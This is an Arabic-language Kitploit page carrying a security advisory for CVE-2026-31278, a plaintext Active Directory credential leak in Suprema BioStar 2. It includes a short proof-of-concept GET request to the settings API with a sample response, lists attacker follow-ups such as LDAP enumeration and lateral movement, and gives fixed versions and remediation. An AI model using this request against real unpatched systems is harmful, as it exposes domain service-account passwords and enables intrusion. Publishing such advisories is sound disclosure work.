Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31278 — تقرير CVE حول ثغرة كشف بيانات اعتماد Active Directory في Suprema BioStar 2 | Kitploit
أدوات/GitHubGitHub/mda1r/cve-2026-31278
ماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالأمن الويبأمن الشبكاتالأوراق والأبحاث
GitHubmda1r/cve-2026-31278

CVE-2026-31278

تقرير CVE حول ثغرة كشف بيانات اعتماد Active Directory في Suprema BioStar 2

عرض المستودع
52منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31278 Suprema BioStar 2: كشف بيانات اعتماد Active Directory


البيانات الوصفية

الحقلالتفاصيل
CVE IDCVE-2026-31278
المورّدSuprema Inc.
المنتجBioStar 2
نوع الثغرةكشف المعلومات الحساسة / كشف بيانات الاعتماد
متجه الهجومعن بُعد / مصادق عليه / منخفض التعقيد
الخطورةعالية
أُصلحت فيBioStar 2 v2.9.12 / BioStarX v1.0.2
الباحثAbdullah Alannaz

الملخص

توجد ثغرة كشف معلومات حساسة في Suprema BioStar 2 بسبب المعالجة غير السليمة لإعدادات تكامل Active Directory. تُعيد نقطة نهاية واجهة برمجة التطبيقات الخلفية /api/v2/setting/adserversetting بيانات اعتماد حساب ربط Active Directory بنص واضح، على الرغم من إخفاء كلمة المرور في واجهة الإدارة.


الإصدارات المتأثرة

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

التفاصيل الفنية

على الرغم من إخفاء حقل كلمة المرور في واجهة الإدارة، فإن الطلبات المصادق عليها الموجهة إلى واجهة برمجة التطبيقات الخلفية تكشف كلمة المرور الكاملة غير المشفرة إلى جانب معلمات تكوين LDAP، بما في ذلك تعطيل اتصال SSL.

يرسل المهاجم المصادق عليه طلب HTTP GET إلى نقطة نهاية تكوين خادم AD ويستلم كلمة مرور حساب خدمة Active Directory بنص واضح داخل استجابة الخادم.

إثبات المفهوم

الطلب:

root@kitploit:~
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

الاستجابة:

root@kitploit:~
{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

الأثر

يمكن للمهاجم المصادق عليه استغلال بيانات الاعتماد المُكشفة من أجل:

  • تنفيذ مصادقة LDAP ضد Active Directory
  • تعداد مستخدمي النطاق والمجموعات والوحدات التنظيمية
  • إجراء استطلاع للشبكة الداخلية
  • تنفيذ حركة جانبية عبر الأنظمة المتصلة بالنطاق
  • إمكانية تصعيد الامتيازات اعتمادًا على صلاحيات حساب الخدمة

الجدول الزمني

تم تعيين CVE-2026-31278 من قبل MITRE | تم إصدار الإصلاح BioStar 2 v2.9.12 / BioStarX v1.0.2 |


المعالجة

  • قم بالتحديث إلى BioStar 2 v2.9.12 أو BioStarX v1.0.2
  • قم بتدوير جميع بيانات اعتماد حساب خدمة Active Directory فورًا
  • قيّد الوصول إلى واجهة برمجة التطبيقات على شرائح الشبكة الموثوقة فقط
  • فعّل LDAPS (SSL) لاتصالات Active Directory

المراجع

  • Suprema Inc.: https://www.supremainc.com

الإسناد

Abdullah Alannaz باحث أمني

تم الإفصاح عن هذه الثغرة بشكل مسؤول إلى Suprema. أكد المورّد المشكلة ونسّق مع MITRE لتعيين CVE.

تنزيل الأداة